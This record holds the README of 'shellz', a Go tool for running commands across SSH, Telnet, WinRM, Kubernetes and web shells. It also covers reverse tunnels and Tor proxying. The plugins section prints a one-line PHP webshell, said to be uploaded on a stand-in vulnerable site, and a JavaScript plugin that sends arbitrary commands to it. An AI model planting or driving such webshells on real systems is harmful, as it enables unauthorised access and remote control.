{"id":13539429,"url":"https://github.com/evilsocket/shellz","last_synced_at":"2025-04-04T11:17:01.002Z","repository":{"id":47658904,"uuid":"150890550","full_name":"evilsocket/shellz","owner":"evilsocket","description":"shellz is a small utility to manage your ssh, telnet, kubernetes, winrm, web or any custom shell in a single place.","archived":false,"fork":false,"pushed_at":"2023-03-07T03:19:19.000Z","size":6659,"stargazers_count":554,"open_issues_count":5,"forks_count":64,"subscribers_count":19,"default_branch":"master","last_synced_at":"2024-05-03T01:46:49.104Z","etag":null,"topics":["access","kubernetes","shell","ssh","telnet","winrm"],"latest_commit_sha":null,"homepage":"","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"other","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/evilsocket.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE.md","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null}},"created_at":"2018-09-29T18:08:37.000Z","updated_at":"2024-04-28T09:34:51.000Z","dependencies_parsed_at":"2022-09-07T02:03:14.764Z","dependency_job_id":null,"html_url":"https://github.com/evilsocket/shellz","commit_stats":{"total_commits":158,"total_committers":5,"mean_commits":31.6,"dds":0.03797468354430378,"last_synced_commit":"2b4e3d2d2cd884375942e9e25e11ff8c16a0c9be"},"previous_names":[],"tags_count":8,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/evilsocket%2Fshellz","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/evilsocket%2Fshellz/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/evilsocket%2Fshellz/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/evilsocket%2Fshellz/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/evilsocket","download_url":"https://codeload.github.com/evilsocket/shellz/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":247166171,"owners_count":20894654,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["access","kubernetes","shell","ssh","telnet","winrm"],"created_at":"2024-08-01T09:01:25.790Z","updated_at":"2025-04-04T11:17:00.980Z","avatar_url":"https://github.com/evilsocket.png","language":"Go","readme":"\u003cp align=\"center\"\u003e\n  \u003csmall\u003eJoin the project community on our server!\u003c/small\u003e\n  \u003cbr/\u003e\u003cbr/\u003e\n  \u003ca href=\"https://discord.gg/https://discord.gg/btZpkp45gQ\" target=\"_blank\" title=\"Join our community!\"\u003e\n    \u003cimg src=\"https://dcbadge.limes.pink/api/server/https://discord.gg/btZpkp45gQ\"/\u003e\n  \u003c/a\u003e\n\u003c/p\u003e\n\u003chr/\u003e\n\n\u003cp align=\"center\"\u003e\n  \u003cimg alt=\"shellz\" src=\"https://raw.githubusercontent.com/evilsocket/shellz/master/logo.png\" /\u003e\n  \u003cp align=\"center\"\u003e\n    \u003ca href=\"https://github.com/evilsocket/shellz/releases/latest\"\u003e\u003cimg alt=\"Release\" src=\"https://img.shields.io/github/release/evilsocket/shellz.svg?style=flat-square\"\u003e\u003c/a\u003e\n    \u003ca href=\"https://github.com/evilsocket/shellz/blob/master/LICENSE.md\"\u003e\u003cimg alt=\"Software License\" src=\"https://img.shields.io/badge/license-GPL3-brightgreen.svg?style=flat-square\"\u003e\u003c/a\u003e\n    \u003ca href=\"https://goreportcard.com/report/github.com/evilsocket/shellz\"\u003e\u003cimg alt=\"Go Report Card\" src=\"https://goreportcard.com/badge/github.com/evilsocket/shellz?style=flat-square\u0026fuckgithubcache=1\"\u003e\u003c/a\u003e\n  \u003c/p\u003e\n\u003c/p\u003e\n\n`shellz` is a small utility to manage your `ssh`, `telnet`, `kubernetes`, `winrm`, `web` or any custom shell in a single place. \n\nThis means that with a single tool with a simple command line, you will be able to execute shell commands on any of those systems transparently, so that you can, for instance, check the uptime of all your systems, whether it is a Windows machine, a Kubernetes pod, an SSH server or a Raspbery Pi like [shown in this demo](https://www.youtube.com/watch?v=ZjMRbUhw9z4).\n\n## Installation\n\nA [precompiled version is available for each release](https://github.com/evilsocket/shellz/releases), alternatively you can use the latest version of the source code from this repository in order to build your own binary.\n\n### From Sources\n\nMake sure you have a correctly configured **Go \u003e= 1.8** environment, that `$GOPATH/bin` is in `$PATH` and then:\n\n    $ go get -u github.com/evilsocket/shellz/cmd/shellz\n\nThis command will download shellz, install its dependencies, compile it and move the `shellz` executable to `$GOPATH/bin`.\n\n## How to Use\n\nThe tool will use the `~/.shellz` folder to load your identities and shells json files, running the command `shellz` the first time will create the folder and the `idents` and `shells` subfolders for you. Once both `~/.shellz/idents` and `~/.shellz/shells` folders have been created, you can start by creating your first identity json file, for instance let's create `~/.shellz/idents/default.json` with the following contents:\n\n```json\n{\n    \"name\": \"default\",\n    \"username\": \"evilsocket\",\n    \"key\": \"~/.ssh/id_rsa\"\n}\n```\n\nAs you can see my `default` identity is using my SSH private key to log in the `evilsocket` user, alternatively you can specify a `\"password\"` field instead of a `\"key\"`. Alternatively, you can set the `\"key\"` field to `\"@agent\"`, in which case shellz will ask the ssh-agent for authentication details to the remote host:\n\n```json\n{\n    \"name\": \"default\",\n    \"username\": \"evilsocket\",\n    \"key\": \"@agent\"\n}\n```\n\n### SSH \n\nNow let's create our first shell json file ( `~/.shellz/shells/media.json` ) that will use the `default` identity we just created to connect to our home media server (called `media.server` in our example):\n\n```json\n{\n    \"name\": \"media-server\",\n    \"host\": \"media.server\",\n    \"groups\": [\"servers\", \"media\", \"whatever\"],\n    \"port\": 22,\n    \"identity\": \"default\"\n}\n```\n\n### Telnet\n\n```sh\ncat ~/.shellz/shells/tnas.json\n```\n\n```json\n{\n    \"name\": \"tnas\",\n    \"host\": \"tnas.local\",\n    \"port\": 23,\n    \"identity\": \"admin-tnas\",\n    \"type\": \"telnet\"\n}\n```\n\n### WinRM\n\n\n```sh\ncat ~/.shellz/shells/win.json\n```\n\n```json\n{\n    \"name\": \"win10\",\n    \"host\": \"win10.local\",\n    \"port\": 5986,\n    \"identity\": \"admin-win10\",\n    \"type\": \"winrm\",\n    \"https\": true,\n    \"insecure\": false\n}\n```\n\n### Kubernetes \n\n```sh\ncat ~/.shellz/shells/kube-pod.json\n```\n\n```json\n{\n  \"name\": \"kube-microbot\",\n  \"host\": \"https://127.0.0.1:16443\",\n  \"type\": \"kube\",\n  \"namespace\": \"default\",\n  \"pod\": \"microbot-5f5499d479-qp9z7\",\n  \"groups\": [\n    \"kube\",\n    \"cluster\"\n  ],\n  \"identity\": \"microk8s\",\n}\n```\n\nWhere the host field must point to the Kubernetes control plane URL obtained with:\n\n    kubectl cluster-info | grep control \n\n```sh\ncat ~/.shellz/idents/microk8s.json\n```\n\n```json\n{\n    \"name\": \"microk8s\",\n    \"key\": \"~/.microk8s-bearer-token\"\n}\n```\n\nWhere the `~/.microk8s-bearer-token` file must contain the bearer token obtained with:\n\n    token=$(kubectl -n kube-system get secret | grep default-token | cut -d \" \" -f1)\n    kubectl -n kube-system describe secret $token | grep \"token:\"    \n\n### SOCKS5\n\nIf you wish to use a SOCKS5 proxy (supported for the `ssh` session and custom shells), for instance to reach a shell on a TOR hidden service, you can use the `\"proxy\"` configuration object:\n\n```json\n{\n  \"name\": \"my-tor-shell\",\n  \"host\": \"whateverwhateveroihfdwoeghfd.onion\",\n  \"port\": 22,\n  \"identity\": \"default\",\n  \"proxy\": {\n    \"address\": \"127.0.0.1\",\n    \"port\": 9050,\n    \"username\": \"this is an optional field\",\n    \"password\": \"this is an optional field\"\n  }\n}\n```\n\n### Using Groups \n\nShells can (optionally) be grouped (with a default `all` group containing all of them) and, by default, they are considered `ssh`, in which case you can also specify the ciphers your server supports:\n\n\n```json\n{\n    \"name\": \"old-server\",\n    \"host\": \"old.server\",\n    \"groups\": [\"servers\", \"legacy\"],\n    \"port\": 22,\n    \"identity\": \"default\",\n    \"ciphers\": [\"aes128-cbc\", \"3des-cbc\"]\n}\n```\n    \n### Reverse Tunnels\n\n`shellz` can be used for starting reverse SSH tunnels, for instance, let's create the `~/.shellz/shells/mytunnel.json` file:\n\n```json\n{\n    \"name\": \"my.tunnel\",\n    \"host\": \"example.com\",\n    \"tunnel\": {\n        \"local\": {\n            \"address\": \"127.0.0.1\",\n            \"port\": 8443\n        },\n        \"remote\": {\n            \"address\": \"192.168.1.1\",\n            \"port\": 443\n        }\n    }\n}\n```\n\nBy running the following command:\n\n    shellz -tunnel -on my.tunnel\n\nThe remote endpoint `https://192.168.1.1` will be tunneled by `example.com` and available on your computer at `https://localhost:8443`.\n\n### Plugins\n\nInstead of one of the supported types, you can specify a custom name, in which case shellz will use an external plugin. \n\nLet's start by creating a new shell json file `~/.shellz/shells/custom.json` with the following contents:\n\n```json\n{\n    \"name\": \"custom\",\n    \"host\": \"http://www.imvulnerable.gov/uploads/sh.php\",\n    \"identity\": \"empty\",\n    \"port\": 80,\n    \"type\": \"mycustomshell\"\n}\n```\n\nAs you probably noticed, the `host` field is the full URL of a very simple PHP webshell uploaded on some website:\n\n```php\n\u003c?php system($_REQUEST[\"cmd\"]); die; ?\u003e\n```\n\nAlso, the `type` field is set to `mycustomshell`, in this case `shellz` will try to load the file `~/.shellz/plugins/mycustomshell.js` and use it to create a session and execute a command. \n\nA `shellz` plugin must export the `Create`, `Exec` and `Close` functions, this is how `mycustomshell.js` looks like:\n\n```js\nvar headers = {\n    'User-Agent': 'imma-shellz-plugin'\n};\n\n/*\n * The Create callback is called whenever a new command has been queued\n * for execution and the session should be initiated, in this case we \n * simply return the main shell object, but it might be used to connect\n * to the endpoint and store the socket on a more complex Object.\n */\nfunction Create(sh) {\n    log.Debug(\"Create(\" + sh + \")\");\n    return sh;\n}\n\n/*\n * Exec is called for each command, the first argument is the object\n * returned from the Create callback, while the second is a string with the\n * command itself.\n */\nfunction Exec(sh, cmd) {\n    log.Debug(\"running \" + cmd + \" on \" + sh.Host);\n    /* \n     * OR\n     *\n     * var resp = http.Post(sh.Host, headers, {\"cmd\":cmd});\n     */\n    var resp = http.Get(sh.Host + \"?cmd=\" + cmd, headers)\n    if( resp.Error ) {\n        log.Error(\"error while running \" + cmd + \": \" + resp.Error);\n        return resp.Error;\n    }\n    return resp.Raw;\n}\n\n/*\n * Used to finalize the state of the object (close sockets, etc).\n */\nfunction Close(sh) {\n    log.Debug(\"Close(\" + sh + \")\");\n}\n```\n\nTo use a SOCKS5 proxy with the `http` object:\n\n```js\nvar proxied = http.WithProxy(\"127.0.0.1\", 9050, \"optional username\", \"optional password\");\n\nproxied.Get(...);\n```\n\nOther than the `log` interface and the `http` client, also a `tcp` client is available with the following API:\n\n```js\n// this will create the client\nvar c = tcp.Connect(\"1.2.3.4:80\");\nif( c == null ) {\n    log.Error(\"could not connect!\");\n    return;\n}\n\n// send some bytes\nc.Write(\"somebyteshere\");\n\n// read some bytes until a newline\nvar ret = c.ReadUntil(\"\\n\");\nif( ret.Error != null ) {\n    log.Error(\"error while reading: \" + err);\n} else {\n    // print results\n    log.Info(\"res=\" + ret.Raw);\n}\n\n// always close the socket\nc.Close();\n```\n\n### Examples\n\nList available identities, plugins and shells:\n\n    shellz -list\n\nList all available identities and shells of the group web:\n\n    shellz -list -on web\n\nEnable the shells named machineA and machineB:\n\n    shellz -enable machineA, machineB\n\nEnable shells of the group `web`:\n\n    shellz -enable web\n\nDisable the shell named machineA (commands won't be executed on it):\n\n    shellz -disable machineA\n\nTest all shells and disable the not responding ones:\n\n    shellz -test\n\nTest two shells and disable them if they don't respond within 1 second:\n\n    shellz -test -on \"machineA, machineB\" -connection-timeout 1s\n\nRun the command `id` on each shell ( with `-to` default to `all`):\n\n    shellz -run id\n\nRun the command 'id' on each shell and print some statistics once finished:\n\n    shellz -run id -stats\n\nRun the command `id` on a single shell named `machineA`:\n\n    shellz -run id -on machineA\n\nRun the command `id` on `machineA` and `machineB`:\n\n    shellz -run id -on 'machineA, machineB'\n\nRun the command `id` on shells of group `web`:\n\n    shellz -run id -on web\n\nRun the command `uptime` on every shell and append all outputs to the `all.txt` file:\n\n    shellz -run uptime -to all.txt\n\nRun the command `uptime` on every shell and save each outputs to a different file using per-shell data (every field referenced between `{{` and `}}` will be replaced by the json field of the [shell object](https://github.com/evilsocket/shellz/blob/master/models/shell.go#L23)):\n\n    shellz -run uptime -to \"{{.Identity.Username}}_{{.Name}}.txt\"\n\nStart a ssh reverse tunnel:\n\n    shellz -tunnel -on some-tunnel\n\nFor a list of all available flags and some usage examples just type `shellz` without arguments.\n\n## License\n\nShellz was made with ♥  by [Simone Margaritelli](https://www.evilsocket.net/) and it's released under the GPL 3 license.\n","funding_links":[],"categories":["Go","\u003ca id=\"1a9934198e37d6d06b881705b863afc8\"\u003e\u003c/a\u003e通信\u0026\u0026代理\u0026\u0026反向代理\u0026\u0026隧道","\u003ca id=\"01e6651181d405ecdcd92a452989e7e0\"\u003e\u003c/a\u003e工具","Command and Control","Operating Systems"],"sub_categories":["\u003ca id=\"56acb7c49c828d4715dce57410d490d1\"\u003e\u003c/a\u003e未分类-Proxy","\u003ca id=\"9d6789f22a280f5bb6491d1353b02384\"\u003e\u003c/a\u003e隧道\u0026\u0026穿透","Browsers Addons"],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fevilsocket%2Fshellz","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fevilsocket%2Fshellz","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fevilsocket%2Fshellz/lists"}